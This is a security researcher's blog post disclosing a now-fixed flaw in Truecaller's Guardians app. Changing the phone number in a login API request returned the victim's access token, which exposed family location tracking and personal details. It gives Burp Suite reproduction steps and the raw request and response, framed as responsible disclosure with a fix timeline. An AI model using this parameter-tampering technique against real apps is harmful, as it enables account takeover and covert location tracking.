Learn more
How we could have tracked anyone's live location using Truecaller's "Guardians" app
Security Research

How we could have tracked anyone's live location using Truecaller's "Guardians" app

It was possible for an attacker to login into a victim's "Guardians" account by just using their phone number. Once the attacker has successfully logged in, they can track all your family member's locations. The application also leaked the victim's account details such as date of birth, profile picture, and emergency contact details. It also allowed an attacker to add more family members to the account once the account is taken over. Truecaller was quick in fixing the reported vulnerability within few hours.

Anand Prakash
March 25, 2021

Truecaller has recently launched a new application named "Guardians," a safety app that lets users share their live location permanently with Guardians that they have chosen from their contacts.
If you are using this application, your selected contacts are supposed to track your location in real-time.  You can also choose to accept help from "Community Guardians," who will get your location after you tap the emergency button. The sign-in process is quite simple for Truecaller users with a single tap.

Summary:
It was possible for an attacker to login into a victim's "Guardians"  account by just using their phone number. Once the attacker has successfully logged in, they can track all your family member's locations. The application also leaked the victim's account details such as date of birth, profile picture, and emergency contact details. It also allowed an attacker to add more family members to the account once the account is taken over. Truecaller was quick in fixing the reported vulnerability within few hours.


Vulnerability Details:
This vulnerability existed in "Log in with Truecaller" option in the "Guardians" application. By Intercepting the Login API request, the attacker could have changed "number" parameter to victim's number keeping all other parameter's value to their and forwarding the API request. The API responded with a valid access token of the victim in response headers.

Steps to Reproduce:
1) Install Truecaller's Guardian's application into your Phone.
2) Start Intercepting application's traffic in Burp Suite Proxy.
3) Click on "Login with Truecaller" option and change the "number" parameter's to victim's phone number, and don't modify any other values in the response.
4) You will be logged in to the victim's account.


Vulnerable Request:


POST /v0/user HTTP/1.1
Host: api.getguardians.com
Content-Type: application/json
Accept: */*
Connection: close
Content-Length: 656
User-Agent: Guardians/1.1.3 (com.truesoftware.Guardians; build:1.1.3; iOS 14.4.0) Alamofire/5.4.1
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Authorization: Bearer aQ4AOdxwPPWJM06sICQMQRWlANOC1crV
Accept-Encoding: gzip, deflate
{
 "userVerificationInput": {
   "nonTCUserToken": "",
   "tcUserSignature": "[attacker's Signature]",
   "tcUserPayload": "[Attacker's Payload]"
 },
 "phoneNumber": {
   "countryCode": "IN",
   "number": "[victim'sPhoneNumber]"
 },
 "tcUser": true,
 "ios": true
}


Response:


HTTP/1.1 200 OK
x-auth-token: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOxxxxxx [Victim's Authorisation token]
content-type: application/json
Content-Length: 65
x-envoy-upstream-service-time: 5
server: istio-envoy
Via: 1.1 google
Alt-Svc: clear
Connection: close
{
 "userID": "xx-xxx-xxx-xxxx-xxx",
 "existing": true
}


Timelines:
March 4th, 2021 1:57 PM IST - Reported to Truecaller's Responsible Disclosure Program
March 4th, 2021 3:24 PM IST- Issue Acknowledged by Truecaller
March 5th, 2021 8:46 PM IST - Emailed Truecaller for an update.
March 6th, 2021 12:04 PM IST - Truecaller confirms that the team has fixed the issue.


This type of vulnerability is categorized as "Insecure Direct Object Reference". Companies tend to miss out on such fundamental issues even after rigorous security assessments. The repercussions of such problems are enormous and impact customers' privacy and lead to companies' revenue losses.
Read more: https://www.pingsafe.ai

ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook’s has ranked Anand as one of their top bounty hunters.And on Twitter’s bounty program, he’s ranked #3 world-wide. Anand’s reputation as a hacker has lead to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”‍

Enjoyed this read?

Stay up to date with the latest security research by PingSafe team.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.